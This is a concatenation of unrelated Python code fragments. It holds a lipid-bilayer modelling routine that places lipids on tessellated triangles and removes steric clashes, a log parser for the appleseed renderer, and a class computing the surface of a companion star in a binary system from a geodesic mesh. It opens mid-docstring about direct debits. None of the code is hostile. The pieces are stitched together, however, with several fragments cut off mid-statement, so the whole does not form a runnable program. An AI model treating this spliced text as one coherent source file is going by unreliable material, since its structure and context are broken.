'supportedOrders' field to find out whether you can pass multiple direct debits or just one. # noqa: E501 :param direct_debits: The direct_debits
the tessellated 3D triangle u = tile_triangle[0] - tile_triangle.center() v = tile_triangle[1] - tile_triangle.center() r1_r2_angle = angle_between(u, v) u = tile_triangle[0] - tile_triangle.center() v = tile_triangle[2] - tile_triangle.center() r1_r3_angle = angle_between(u, v) # calculate the appropriate location of an identical triangle on the user-defined planar-bilayer model. ignoring z for now (since lipid is oriented along x-y plane) lipid_triangle_pt1 = numpy.array([0.0, tile_r1, 0.0]) lipid_triangle_pt2 = numpy.array([-tile_r2 * numpy.cos(r1_r2_angle - (numpy.pi/2.0)), -tile_r2 * numpy.sin(r1_r2_angle - (numpy.pi/2.0)), 0.0]) lipid_triangle_pt3 = numpy.array([tile_r3 * numpy.cos(r1_r3_angle - (numpy.pi/2.0)), -tile_r3 * numpy.sin(r1_r3_angle - (numpy.pi/2.0)), 0.0]) # rotate the identical triangle randomly about z axis random_theta = numpy.random.uniform(0, 2.0 * numpy.pi) rot_matrix = numpy.array([[numpy.cos(random_theta), numpy.sin(random_theta), 0.0], [-numpy.sin(random_theta), numpy.cos(random_theta), 0.0], [0.0, 0.0, 1.0]]) lipid_triangle_pt1 = numpy.dot(rot_matrix, lipid_triangle_pt1) lipid_triangle_pt2 = numpy.dot(rot_matrix, lipid_triangle_pt2) lipid_triangle_pt3 = numpy.dot(rot_matrix, lipid_triangle_pt3) # now pick an appropriate location, and move the identical triangle to that location along x-y plane lipid_triangle_center_x = numpy.random.uniform(min_headgroups[0]+tile_triangle.max_radius(), max_headgroups[0]-tile_triangle.max_radius()) lipid_triangle_center_y = numpy.random.uniform(min_headgroups[1]+tile_triangle.max_radius(), max_headgroups[1]-tile_triangle.max_radius()) lipid_triangle_center = numpy.array([lipid_triangle_center_x, lipid_triangle_center_y, 0.0]) lipid_triangle_pt1 = lipid_triangle_pt1 + lipid_triangle_center lipid_triangle_pt2 = lipid_triangle_pt2 + lipid_triangle_center lipid_triangle_pt3 = lipid_triangle_pt3 + lipid_triangle_center lipid_triangle = numpy.array([lipid_triangle_pt1, lipid_triangle_pt2, lipid_triangle_pt3]) # now get the transformation matrix to transform the identical triangle onto the 3D tessellated triangle # and apply the transformation transform_data = get_transformation_data(tile_triangle.points, lipid_triangle) lipid.undo() apply_transformation(lipid,transform_data) # project the headgroups of the planar bilayer onto the identical triangle headgroup_markers_indices = lipid.get_indices_of_mask_match(params['lipid_headgroup_marker']) headgroup_markers_coors = lipid.all_atoms_numpy[headgroup_markers_indices] headgroup_marker_proj_coors = tile_triangle.project_points_onto_triangle(headgroup_markers_coors) # identify the indices of the head groups that fall within the triangle when projected headgroup_indices_to_keep = get_numpy_slice(headgroup_markers_indices, tile_triangle.get_indices_of_points_within_triangle_boundaries(headgroup_marker_proj_coors)) # there are legitamte circumstances where no headgroups should be retained (i.e., no headgroups fall within the triangle boundaries) # for example, sometimes the scipy tesselation could produce "triangles" that are actually lines. # so abort efforts if this is the case. if len(headgroup_indices_to_keep) == 0 and len(headgroup_marker_proj_coors) !=0: molecules_in_this_triangle = [] if params['use_disk_instead_of_memory'] == "TRUE": an_id = save_pickle(molecules_in_this_triangle, params) self.results.append((tile_triangle, an_id)) else: self.results.append((tile_triangle, molecules_in_this_triangle)) return # identify the indices of the head groups that fall within a smaller triangle, that are too far from the edges to worry about steric clashes in subsequent steps. # this speeds up subsequent steps significantly smaller_tri = tile_triangle.new_triangle_expanded_by_margin(-params['clashing_potential_margin']) todel = smaller_tri.get_indices_of_points_within_triangle_boundaries(headgroup_marker_proj_coors) headgroup_indices_not_in_triangle_margin = get_numpy_slice(headgroup_markers_indices, todel) # identify the indices of the head groups that fall within an even smaller triangle, called the submargin. # identifying these headgroups will speed up the lipid-filling step later. Lipids will be placed in the margin, and the steric clashes are checked with the lipids of the submargin (as well as the margins of neighboring triangles) smaller_still_tri = smaller_tri.new_triangle_expanded_by_margin(-params['clashing_potential_margin']) todel = smaller_still_tri.get_indices_of_points_within_triangle_boundaries(headgroup_marker_proj_coors) headgroup_indices_not_in_triangle_margin_or_submargin = get_numpy_slice(headgroup_markers_indices, todel) # now get the entire lipids corresponding to these headgroups molecules_in_this_triangle = [] # first, identify all residues atom_counts = len(lipid.atom_inf_resids) all_ids = numpy.core.defchararray.add(lipid.atom_inf_string_vals[:,0], numpy.array(['_'] * atom_counts)) all_ids = numpy.core.defchararray.add(all_ids, lipid.atom_inf_resids) all_ids = numpy.core.defchararray.add(all_ids, numpy.array(['_'] * atom_counts)) all_ids = numpy.core.defchararray.add(all_ids, lipid.atom_inf_string_vals[:,1]) # now identify all residues to keep atom_counts = len(headgroup_indices_to_keep) if atom_counts != 0: hg_ids = numpy.core.defchararray.add(lipid.atom_inf_string_vals[headgroup_indices_to_keep,0], numpy.array(['_'] * atom_counts)) hg_ids = numpy.core.defchararray.add(hg_ids, lipid.atom_inf_resids[headgroup_indices_to_keep]) hg_ids = numpy.core.defchararray.add(hg_ids, numpy.array(['_'] * atom_counts)) hg_ids = numpy.core.defchararray.add(hg_ids, lipid.atom_inf_string_vals[headgroup_indices_to_keep,1]) else: hg_ids = numpy.array([]) # now identify all residues to never delete (inside inner triangle) atom_counts = len(headgroup_indices_not_in_triangle_margin) if atom_counts != 0: hg_ids_not_in_triangle_margin = numpy.core.defchararray.add(lipid.atom_inf_string_vals[headgroup_indices_not_in_triangle_margin,0], numpy.array(['_'] * atom_counts)) hg_ids_not_in_triangle_margin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin, lipid.atom_inf_resids[headgroup_indices_not_in_triangle_margin]) hg_ids_not_in_triangle_margin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin, numpy.array(['_'] * atom_counts)) hg_ids_not_in_triangle_margin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin, lipid.atom_inf_string_vals[headgroup_indices_not_in_triangle_margin,1]) else: hg_ids_not_in_triangle_margin = numpy.array([]) # now identify all residues that are even interior to the submargin atom_counts = len(headgroup_indices_not_in_triangle_margin_or_submargin) if atom_counts != 0: hg_ids_not_in_triangle_margin_or_submargin = numpy.core.defchararray.add(lipid.atom_inf_string_vals[headgroup_indices_not_in_triangle_margin_or_submargin,0], numpy.array(['_'] * atom_counts)) hg_ids_not_in_triangle_margin_or_submargin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin_or_submargin, lipid.atom_inf_resids[headgroup_indices_not_in_triangle_margin_or_submargin]) hg_ids_not_in_triangle_margin_or_submargin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin_or_submargin, numpy.array(['_'] * atom_counts)) hg_ids_not_in_triangle_margin_or_submargin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin_or_submargin, lipid.atom_inf_string_vals[headgroup_indices_not_in_triangle_margin_or_submargin,1]) else: hg_ids_not_in_triangle_margin_or_submargin = numpy.array([]) # remove the lipids that are beyond the bounds of this triangle to speed up subsequent searching # Find the indices of elements of all_ids that are in hg_ids. iall_ids = numpy.in1d(all_ids.ravel(), hg_ids).reshape(all_ids.shape) indices_of_lipids_to_keep = numpy.where(iall_ids)[0] lipid = lipid.portion_of(indices_of_lipids_to_keep) all_ids = all_ids[indices_of_lipids_to_keep] # find where to split this lipid model into individual lipids all_ids_offset = all_ids.copy() all_ids_offset = numpy.append(all_ids_offset, all_ids_offset[0]) all_ids_offset = all_ids_offset[numpy.arange(1, len(all_ids_offset), dtype=int)] indices_of_each_lipid = 1 + numpy.nonzero(numpy.logical_not(all_ids == all_ids_offset))[0] indices_of_each_lipid = numpy.insert(indices_of_each_lipid,0,0) # now move each individual lipid into its own object and append gc.disable() # because appending objects for t in range(len(indices_of_each_lipid)-1): start_index = indices_of_each_lipid[t] end_index = indices_of_each_lipid[t+1] atom_range = numpy.arange(start_index, end_index, dtype=int) single_lipid = lipid.portion_of(atom_range) single_lipid.in_triangle_submargin = False single_lipid.in_triangle_margin = True ### POSSIBLE FUTURE PROBLEM HERE. ### # See https://stackoverflow.com/questions/40659212/futurewarning-elementwise-comparison-failed-returning-scalar-but-in-the-futur # Kicking the can down the road, as suggested... with warnings.catch_warnings(): # Kicking the can warnings.simplefilter(action='ignore', category=FutureWarning) # down the road... if all_ids[start_index] in hg_ids_not_in_triangle_margin: single_lipid.in_triangle_margin = False if not all_ids[start_index] in hg_ids_not_in_triangle_margin_or_submargin: single_lipid.in_triangle_submargin = True molecules_in_this_triangle.append(single_lipid) if params['use_disk_instead_of_memory'] == "TRUE": an_id = save_pickle(molecules_in_this_triangle, params) self.results.append((tile_triangle, an_id)) else: self.results.append((tile_triangle, molecules_in_this_triangle)) gc.enable() input_array = [(params, lipid, tile_triangle, min_headgroups, max_headgroups, index+1) for index, tile_triangle in enumerate(all_triangles)] tmp = multi_threading(input_array, params['number_of_processors'], position_lipids_multiprocessing, params, "REMARK ") molecules_by_triangle = tmp.results return molecules_by_triangle ################## REMOVE STATIC CLASHES ################## def remove_steric_clashes(molecules_by_triangle, params): """Remove lipids that have steric clashes Arguments: molecules_by_triangle -- A list of tuples, where each tuple contains a Triangle object and a list of lipid molecules (Molecule objects) that belong to that triangle params -- A dictionary, the user-specified command-line parameters """ class remove_clashes_multiprocessing(general_task): """A class for identifying lipids that have steric clashes""" def value_func(self, item, results_queue): # so overwriting this function """Identify lipids that have steric clashes Arguments: item -- A list or tuple, the input data required for the calculation results_queue -- A multiprocessing.Queue() object for storing the calculation output """ triangle_index1 = item[0] triangle_index2 = item[1] triangle1 = item[2] triangle1_lipids = item[3] triangle2 = item[4] triangle2_lipids = item[5] params = item[6] self.print_star_if_appropriate(item[7]) if triangle1.near_other_triangle(triangle2, params): # so only the lipids of proximate triangles are considered if params['use_disk_instead_of_memory'] == "TRUE": triangle1_lipids = load_pickle(triangle1_lipids, params) if params['use_disk_instead_of_memory'] == "TRUE": triangle2_lipids = load_pickle(triangle2_lipids, params) clash_map = {} # now generate a numpy array containing all the headgroups of the lipids of each triangle triangle1_headgroups = numpy.empty((len(triangle1_lipids), 3)) for lipid_index, lipid in enumerate(triangle1_lipids): headgroup_loc = lipid.all_atoms_numpy[lipid.get_headgroup_index(params['lipid_headgroup_marker'])] triangle1_headgroups[lipid_index][0] = headgroup_loc[0] triangle1_headgroups[lipid_index][1] = headgroup_loc[1] triangle1_headgroups[lipid_index][2] = headgroup_loc[2] triangle2_headgroups = numpy.empty((len(triangle2_lipids), 3)) for lipid_index, lipid in enumerate(triangle2_lipids): headgroup_loc = lipid.all_atoms_numpy[lipid.get_headgroup_index(params['lipid_headgroup_marker'])] triangle2_headgroups[lipid_index][0] = headgroup_loc[0] triangle2_headgroups[lipid_index][1] = headgroup_loc[1] triangle2_headgroups[lipid_index][2] = headgroup_loc[2] # get the indices of all the lipids in the margin of the first lipid indices_in_margin1 = [] for idx, lip in enumerate(triangle1_lipids): if lip.in_triangle_margin == True: indices_in_margin1.append(idx) indices_in_margin1 = numpy.array(indices_in_margin1) if len(indices_in_margin1) > 0: # so there are some lipids in the margin # get the indices of all the lipids in the margin of the second lipid indices_in_margin2 = [] for idx, lip in enumerate(triangle2_lipids): if lip.in_triangle_margin == True: indices_in_margin2.append(idx) indices_in_margin2 = numpy.array(indices_in_margin2) if len(indices_in_margin2) > 0: # so there are some lipids in the margin # now, look at distances between all headgroups in margin to identify ones that are close enough to potentially clash dists = cdist(triangle1_headgroups[indices_in_margin1], triangle2_headgroups[indices_in_margin2]) dists = dists < params['very_distant_lipids_cutoff'] indices_to_look_at1 = indices_in_margin1[numpy.nonzero(dists)[0]] indices_to_look_at2 = indices_in_margin2[numpy.nonzero(dists)[1]] # now do a pairwise comparison of all lipids, looking for clashes for t in range(len(indices_to_look_at1)): lipid_index1 = indices_to_look_at1[t] lipid1 = triangle1_lipids[lipid_index1] if lipid1.in_triangle_margin == True: lipid_index2 = indices_to_look_at2[t] lipid2 = triangle2_lipids[lipid_index2] if lipid2.in_triangle_margin == True: if two_lipids_clash(lipid1, lipid2, params['clash_cutoff'], 1, params, False): # there's a clash. update the clash map try: clash_map[(lipid_index1, triangle_index1)].append((lipid_index2, triangle_index2)) except: clash_map[(lipid_index1, triangle_index1)] = [] clash_map[(lipid_index1, triangle_index1)].append((lipid_index2, triangle_index2)) try: clash_map[(lipid_index2, triangle_index2)].append((lipid_index1, triangle_index1)) except: clash_map[(lipid_index2, triangle_index2)] = [] clash_map[(lipid_index2, triangle_index2)].append((lipid_index1, triangle_index1)) self.results.append(clash_map) # generate a clash map, whcih specifies which lipids clash with each other some_input = [] gc.disable() # because appending complex objects to a list t = 0 for triangle_index1 in range(len(molecules_by_triangle)-1): for triangle_index2 in range(triangle_index1 + 1, len(molecules_by_triangle)): t =
import datetime import csv import re import os.path import sys #from PyQt4 import uic, QtGui, QtCore from PySide import QtUiTools, QtGui, QtCore import functools #http://thomas-cokelaer.info/tutorials/sphinx/docstring_python.html ################################################################################ # Prepare regex ################################################################################ re_main = re.compile( '(?P<timestamp>[0-9TZ:.-]+)\s+' '\<(?P<thread_id>\d{3})\>\s+' '(?P<vm>\d+)\s+MB\s+' '(?P<msg_cat>\w+)\s+' '\|(?P<msg_rest>.*)\n?' ) re_opening_texture_file = re.compile( '\s*opening texture file (?P<texture_path>[\w./\\\\-]+) for reading\.\.\.' ) re_rendering_progress = re.compile( '\s*rendering\, (?P<percentage>[\d.]+)\% done' ) re_wrote_image_file = re.compile( '\s*wrote image file (?P<image_path>[\w./\\\\-]+) in (?P<milliseconds>[\d,]+) ms\.' ) re_project_file_path = re.compile( '\s*loading project file (?P<project_file_path>[\w./\\\\-]+)\.\.\.' ) re_loaded_mesh_file = re.compile( '\s*loaded mesh file (?P<mesh_path>[\w./\\\\-]+) ' '\((?P<objects>[\d,]+) object, ' '(?P<vertices>[\d,]+) vertices, ' '(?P<triangles>[\d,]+) triangles\) ' 'in (?P<milliseconds>[\d,]+) ms\.' ) re_scene_bounding_box = re.compile( '\s*scene bounding box\: ' '\((?P<pt1_x>[0-9.-]+)\, (?P<pt1_y>[0-9.-]+)\, (?P<pt1_z>[0-9.-]+)\)\-' '\((?P<pt2_x>[0-9.-]+)\, (?P<pt2_y>[0-9.-]+)\, (?P<pt2_z>[0-9.-]+)\)\.' ) re_scene_diameter = re.compile( '\s*scene diameter\: (?P<diameter>[0-9.-]+)\.' ) re_while_loading_mesh_object = re.compile( '\s*while loading mesh object \"(?P<object>[\w.]+)\"\:(?P<problem>.+)' ) # option regex re_opt_frame_settings_trigger = re.compile( '\s*frame settings\:' ) re_opt_frame_settings_resolution = re.compile( '\s*resolution\s+(?P<x_resolution>[\d,]+) x (?P<y_resolution>[\d,]+)' ) re_opt_frame_settings_tile_size = re.compile( '\s*tile size\s+(?P<x_resolution>[\d,]+) x (?P<y_resolution>[\d,]+)' ) re_opt_frame_settings_pixel_format = re.compile( '\s*pixel format\s+(?P<pixel_format>[\w]+)' ) re_opt_frame_settings_filter = re.compile( '\s*filter\s+(?P<filter>[\w]+)' ) re_opt_frame_settings_filter_size = re.compile( '\s*filter size\s+(?P<filter_size>[\d.]+)' ) re_opt_frame_settings_color_space = re.compile( '\s*color space\s+(?P<color_space>[\w]+)' ) re_opt_frame_settings_premult_alpha = re.compile( '\s*premult\. alpha\s+(?P<premult_alpha>(on|off))' ) re_opt_frame_settings_clamping = re.compile( '\s*clamping\s+(?P<clamping>(on|off))' ) re_opt_frame_settings_gamma_correction = re.compile( '\s*gamma correction\s+(?P<gamma_correction>[\w]+)' ) re_opt_frame_settings_crop_window = re.compile( '\s*crop window\s+\((?P<x_top_left>[\d,]+), (?P<y_top_left>[\d,]+)\)-\((?P<x_bottom_right>[\d,]+), (?P<y_bottom_right>[\d,]+)\)' ) datetime_str_format = '%Y-%m-%dT%H:%M:%S.%fZ' class ASLogLine( object ) : """Class representing a parsed line of an appleseed log file""" __slots__ = ( 'line' , # the whole line string 'number' , # the line number '_raw_timestamp' , # timestamp string '_timestamp' , # cached datetime 'thread_id' , 'vm' , 'msg_cat' , # debug/info/warning/error 'msg_rest' , # Everything after the pipe 'msg_content' , 'frame_setting_trigger' ) # Details of msg_rest def __init__( self, line, number = -1 ) : """Init the class instance Raise a ValueError is the given line is not parsable """ assert isinstance( line , basestring ), type( line ) assert isinstance( number, int ), type( number ) self.line = line self.number = number self._raw_timestamp = None self._timestamp = None self.thread_id = None self.vm = None self.msg_cat = None self.msg_rest = None self.msg_content = {} # option triggers self.frame_setting_trigger = False self.__parse() def __parse( self ) : """Parse line content and fill the ASLogLine instance""" # first part of the line (always the same pattern) match_grp = re_main.match( self.line ) if not match_grp : raise ValueError( "Can't parse line {0.number} : {0.line}".format( self ) ) self._raw_timestamp = match_grp.group( 'timestamp' ) self.thread_id = int( match_grp.group( 'thread_id' ) ) self.vm = int( match_grp.group( 'vm' ) ) self.msg_cat = match_grp.group( 'msg_cat' ) self.msg_rest = match_grp.group( 'msg_rest' ) self.msg_content[ 'type' ] = None # Loading project file match_grp = re_project_file_path.match( self.msg_rest ) if match_grp : self.msg_content[ 'type' ] = 'loading_project_file' self.msg_content[ 'project_file_path' ] = match_grp.group( 'project_file_path' ) # Opening texture file match_grp = re_opening_texture_file.match( self.msg_rest ) if match_grp : self.msg_content[ 'type' ] = 'opening_texture_file' self.msg_content[ 'texture_path' ] = match_grp.group( 'texture_path' ) # Rendering progress match_grp = re_rendering_progress.match( self.msg_rest ) if match_grp : self.msg_content[ 'type' ] = 'rendering_progress' self.msg_content[ 'percentage' ] = float( match_grp.group( 'percentage' ) ) # Write final image match_grp = re_wrote_image_file.match( self.msg_rest ) if match_grp : self.msg_content[ 'type' ] = 'wrote_image_file' self.msg_content[ 'image_path' ] = match_grp.group( 'image_path' ) raw_milliseconds = match_grp.group( 'milliseconds' ) raw_milliseconds = raw_milliseconds.replace( ',', '' ) self.msg_content[ 'milliseconds' ] = int( raw_milliseconds ) # Mesh file loaded match_grp = re_loaded_mesh_file.match( self.msg_rest ) if match_grp : self.msg_content[ 'type' ] = 'loaded_mesh_file' self.msg_content[ 'mesh_path' ] = match_grp.group( 'mesh_path' ) raw_objects = match_grp.group( 'objects' ) raw_objects = raw_objects.replace( ',', '' ) self.msg_content[ 'objects' ] = int( raw_objects ) raw_vertices = match_grp.group( 'vertices' ) raw_vertices = raw_vertices.replace( ',', '' ) self.msg_content[ 'vertices' ] = int( raw_vertices ) raw_triangles = match_grp.group( 'triangles' ) raw_triangles = raw_triangles.replace( ',', '' ) self.msg_content[ 'triangles' ] = int( raw_triangles ) raw_milliseconds = match_grp.group( 'milliseconds' ) raw_milliseconds = raw_milliseconds.replace( ',', '' ) self.msg_content[ 'milliseconds' ] = int( raw_milliseconds ) # Scene bounding box match_grp = re_scene_bounding_box.match( self.msg_rest ) if match_grp : self.msg_content[ 'type' ] = 'scene_bounding_box' self.msg_content[ 'bounding_box' ] = ( ( float( match_grp.group( 'pt1_x' ) ) , float( match_grp.group( 'pt1_y' ) ) , float( match_grp.group( 'pt1_z' ) ) ) , ( float( match_grp.group( 'pt2_x' ) ) , float( match_grp.group( 'pt2_y' ) ) , float( match_grp.group( 'pt2_z' ) ) ) ) # Scene diameter match_grp = re_scene_diameter.match( self.msg_rest ) if match_grp : self.msg_content[ 'type' ] = 'scene_diameter' self.msg_content[ 'diameter' ] = match_grp.group( 'diameter' ) match_grp = re_while_loading_mesh_object.match( self.msg_rest ) if match_grp : self.msg_content[ 'type' ] = 'while_loading_mesh_object' self.msg_content[ 'object' ] = match_grp.group( 'object' ) self.msg_content[ 'problem' ] = match_grp.group( 'problem' ) ####################################################################### # Triggers ####################################################################### match_grp = re_opt_frame_settings_trigger.match( self.msg_rest ) if match_grp : self.frame_setting_trigger = True @property def is_empty( self ) : """Return if the line is empty""" return len( self.line ) == 0 or self.line == '\n' @property def timestamp( self ) : """Return a `datetime` object corresponding the given line""" if self._timestamp is None and self._raw_timestamp is not None : self._timestamp = datetime.datetime.strptime( self._raw_timestamp , datetime_str_format ) return self._timestamp class ASLog( object ) : """The main appleseed log class :Example: >>> from appleseed.log_parser import ASLog >>> as_log = ASLog('frame.1001.log') >>> list(as_log.opened_texture_files) ['./_textures/coke_can_diff.exr', './_textures/coke_can_diff.exr', ...] >>> as_log.ranges['vm'] (10, 108) >>> for line in as_log: ... print line.msg_content ... {'vertices': 16, 'mesh_path': './_geometry/... """ def __init__( self, path ) : self._path = path self._lines_data = list() # options self._options = dict() # ranges self._ranges = dict() self._ranges[ 'first_datetime' ] = None self._ranges[ 'last_datetime' ] = None self._ranges[ 'vm' ] = ( 9999999, -9999999 ) self._parse() def __len__( self ) : return len( self._lines_data ) def __getitem__( self, index ) : return self._lines_data[ index ] @property def _lines( self ) : """Read every lines from the log file.""" with open( self._path, 'r' ) as log_file : for line in log_file : yield line def _parse( self ) : triggereds = set() for i, line in enumerate( self._lines ) : try : line_data = ASLogLine( line, i ) except Exception : print "Warning, can't parse line {0} : {1}".format( i , line ) continue if line_data.is_empty : continue self._lines_data.append( line_data ) ################################################################ # Options ################################################################ msg_rest = line_data.msg_rest if 'frame_settings' in triggereds : ############################################################ # Frame settings ############################################################ if 'frame_settings' not in self._options : self._options[ 'frame_settings' ] = dict() # shortcut d = self._options[ 'frame_settings' ] match_grp = re_opt_frame_settings_resolution.match( msg_rest ) if match_grp : x = match_grp.group( 'x_resolution' ) x = int( x.replace( ',', '' ) ) y = match_grp.group( 'y_resolution' ) y = int( y.replace( ',', '' ) ) d[ 'resolution' ] = ( x, y ) match_grp = re_opt_frame_settings_tile_size.match( msg_rest ) if match_grp : x = match_grp.group( 'x_resolution' ) x = int( x.replace( ',', '' ) ) y = match_grp.group( 'y_resolution' ) y = int( y.replace( ',', '' ) ) d[ 'tile_size' ] = ( x, y ) match_grp = re_opt_frame_settings_pixel_format.match( msg_rest ) if match_grp : d[ 'pixel_format' ] = match_grp.group( 'pixel_format' ) match_grp = re_opt_frame_settings_filter.match( msg_rest ) if match_grp : d[ 'filter' ] = match_grp.group( 'filter' ) match_grp = re_opt_frame_settings_filter_size.match( msg_rest ) if match_grp : d[ 'filter_size' ] = float( match_grp.group( 'filter_size' ) ) match_grp = re_opt_frame_settings_color_space.match( msg_rest ) if match_grp : d[ 'color_space' ] = match_grp.group( 'color_space' ) match_grp = re_opt_frame_settings_premult_alpha.match( msg_rest ) if match_grp : premult_alpha = match_grp.group( 'premult_alpha' ) d[ 'premult_alpha' ] = True if premult_alpha == 'on' else False match_grp = re_opt_frame_settings_clamping.match( msg_rest ) if match_grp : clamping = match_grp.group( 'clamping' ) d[ 'clamping' ] = True if clamping == 'on' else False match_grp = re_opt_frame_settings_gamma_correction.match( msg_rest ) if match_grp : d[ 'gamma_correction' ] = float( match_grp.group( 'gamma_correction' ) ) # latest line of the option match_grp = re_opt_frame_settings_crop_window.match( msg_rest ) if match_grp : x_top_left = match_grp.group( 'x_top_left' ) x_top_left = int( x_top_left.replace( ',', '' ) ) y_top_left = match_grp.group( 'y_top_left' ) y_top_left = int( y_top_left.replace( ',', '' ) ) x_bottom_right = match_grp.group( 'x_bottom_right' ) x_bottom_right = int( x_bottom_right.replace( ',', '' ) ) y_bottom_right = match_grp.group( 'y_bottom_right' ) y_bottom_right = int( y_bottom_right.replace( ',', '' ) ) d[ 'crop_window' ] = ( x_top_left , y_top_left , x_bottom_right , y_bottom_right ) triggereds.remove( 'frame_settings'
# Licensed under a 3-clause BSD style license - see LICENSE from __future__ import print_function, division __all__ = ["Star"] from ..Utils.import_modules import * from .. import Utils from .Star_base import Star_base logger = logging.getLogger(__name__) ######################## class Star ######################## class Star(Star_base): """Star(Star_base) This class allows determine the flux of the companion star in a binary system using an atmosphere grid. It is derived from the Star_base class. The noticeable difference is that the surface is constructed from a geodesic tesselation of equilateral triangles derived from an isocahedron. Axis convention: x: From the primary center of mass towards the secondary. y: Along the orbital plane along the orbital motion. z: Along the orbital angular momentum. """ def __init__(self, ndiv, atmo_grid=None, read=False, oldchi=False): Star_base.__init__(self, ndiv, atmo_grid=atmo_grid) if read: self._Read_geodesic() else: self._New_Initialization() self.oldchi = oldchi def _New_Initialization(self): """Initialization(self) Run important initialization steps important for the class to work. self.vertices contains x,y,z coordinates of vertices. shape = self.n_vertices,3 self.faces contains indices of vertices forming faces. shape = self.n_faces,3 self.assoc contains indices of faces associated to a vertice. shape = self.n_vertices,6 Note: when only 5 faces associated, 6th value is equal to -99 """ print( "Generating the geodesic surface using PyGTS" ) try: import gts except: print( "You likely don't have the PyGTS package installed on your computer." ) print( "It is impossible to create the surface vertices from scratch." ) print( "Will trying reading them from the restart file instead." ) self._Read_geodesic() return # Generate the geodesic primitives s = gts.sphere(self.ndiv) x,y,z,t = gts.get_coords_and_face_indices(s,True) self.vertices = np.c_[x,y,z] self.faces = np.array(t) self.n_vertices = self.vertices.shape[0] self.n_faces = self.faces.shape[0] print( "Calculatating the associations" ) self.assoc = Utils.Tessellation.Match_assoc(self.faces, self.n_vertices) # We will pre-calculate the surface areas. They will need to be multiplied by rc^2. # The calculation is simply the Pythagorean sum of the areas of the respective projections on the x,y,z planes. print( "meshing the surface" ) mesh = self.vertices[self.faces] print( "calculating the area" ) self.pre_area = 0.5 *np.sqrt( ((mesh[:,0,0]*mesh[:,1,1]+mesh[:,1,0]*mesh[:,2,1]+mesh[:,2,0]*mesh[:,0,1]) - (mesh[:,0,1]*mesh[:,1,0]+mesh[:,1,1]*mesh[:,2,0]+mesh[:,2,1]*mesh[:,0,0]))**2 + ((mesh[:,0,1]*mesh[:,1,2]+mesh[:,1,1]*mesh[:,2,2]+mesh[:,2,1]*mesh[:,0,2]) - (mesh[:,0,2]*mesh[:,1,1]+mesh[:,1,2]*mesh[:,2,1]+mesh[:,2,2]*mesh[:,0,1]))**2 + ((mesh[:,0,2]*mesh[:,1,0]+mesh[:,1,2]*mesh[:,2,0]+mesh[:,2,2]*mesh[:,0,0]) - (mesh[:,0,0]*mesh[:,1,2]+mesh[:,1,0]*mesh[:,2,2]+mesh[:,2,0]*mesh[:,0,2]))**2 ) # The cosine of x,y,z for the center of the faces. shape = n_faces, 3 print( "calculating the angles" ) self.cosx, self.cosy, self.cosz = mesh.mean(axis=1).T return def _Initialization(self): """Initialization(self) Run important initialization steps important for the class to work. self.vertices contains x,y,z coordinates of vertices. shape = self.n_vertices,3 self.faces contains indices of vertices forming faces. shape = self.n_faces,3 self.assoc contains indices of faces associated to a vertice. shape = self.n_vertices,6 Note: when only 5 faces associated, 6th value is equal to -99 """ print( "Generating the geodesic surface" ) # Generate the geodesic primitives self.n_faces, self.n_vertices, self.faces, self.vertices, self.assoc = Utils.Tessellation.Make_geodesic(self.ndiv) # We will pre-calculate the surface areas. They will need to be multiplied by rc^2. # The calculation is simply the Pythagorean sum of the areas of the respective projections on the x,y,z planes. print( "meshing the surface" ) mesh = self.vertices[self.faces] print( "calculating the area" ) self.pre_area = 0.5 *np.sqrt( ((mesh[:,0,0]*mesh[:,1,1]+mesh[:,1,0]*mesh[:,2,1]+mesh[:,2,0]*mesh[:,0,1]) - (mesh[:,0,1]*mesh[:,1,0]+mesh[:,1,1]*mesh[:,2,0]+mesh[:,2,1]*mesh[:,0,0]))**2 + ((mesh[:,0,1]*mesh[:,1,2]+mesh[:,1,1]*mesh[:,2,2]+mesh[:,2,1]*mesh[:,0,2]) - (mesh[:,0,2]*mesh[:,1,1]+mesh[:,1,2]*mesh[:,2,1]+mesh[:,2,2]*mesh[:,0,1]))**2 + ((mesh[:,0,2]*mesh[:,1,0]+mesh[:,1,2]*mesh[:,2,0]+mesh[:,2,2]*mesh[:,0,0]) - (mesh[:,0,0]*mesh[:,1,2]+mesh[:,1,0]*mesh[:,2,2]+mesh[:,2,0]*mesh[:,0,2]))**2 ) # The cosine of x,y,z for the center of the faces. shape = n_faces, 3 print( "calculating the angles" ) self.cosx, self.cosy, self.cosz = mesh.mean(axis=1).T return def Outline(self, ntheta=100, debug=False): """Outline(ntheta=100, debug=False) Calculates the radii of the outline of the star for a vector of theta=np.arange(ntheta)/ntheta*cts.TWOPI. theta is defined as np.arctan2(y_projected,z_projected). theta0 = 0 dtheta = cts.TWOPI/ntheta ntheta (100): Number of points defining the outline. debug (False): Print debug information when True. >>> self._Outline() """ if debug: print( 'Begin _Outline()' ) theta = np.arange(ntheta, dtype=float)/ntheta * cts.TWOPI y = np.cos(theta) z = np.sin(theta) # radii of the outline of the star. radii = self._Radius(y*0., y, z, self.psi0, self.rc_eq) return radii def _Read_geodesic(self): """Read_geodesic() The information about the geodesic surface on the unit sphere has already been precalculated. We simply load the one have the desired precision. """ #f = open('geodesic/geodesic_n%i.txt'%self.ndiv, 'r') f = open(Utils.__path__[0][:-5]+'geodesic/geodesic_n%i.txt'%self.ndiv, 'r') lines = f.readlines() # We store the number of vertices, faces and edges as class variables. tmp, self.n_vertices, self.n_faces, self.n_edges = lines[0].split() self.n_vertices = int(self.n_vertices) self.n_faces = int(self.n_faces) self.n_edges = int(self.n_edges) # Vertice information contains coordinate x,y,z of vertices. shape = n_vertices,3 self.vertices = np.array([l.split() for l in lines[1:1+self.n_vertices]], dtype=float) # Face information contains indices of vertices forming faces. shape = n_faces,3 self.faces = np.array([l.split() for l in lines[1+self.n_vertices:1+self.n_vertices+self.n_faces]], dtype=int) self.faces = self.faces[:,1:] # We calculate the associations self.assoc = Utils.Tessellation.Match_assoc(self.faces, self.n_vertices) # We will pre-calculate the surface areas. They will need to be multiplied by rc^2. # The calculation is simply the Pythagorean sum of the areas of the respective projections on the x,y,z planes. mesh = self.vertices[self.faces] self.pre_area = 0.5 *np.sqrt( ((mesh[:,0,0]*mesh[:,1,1]+mesh[:,1,0]*mesh[:,2,1]+mesh[:,2,0]*mesh[:,0,1]) - 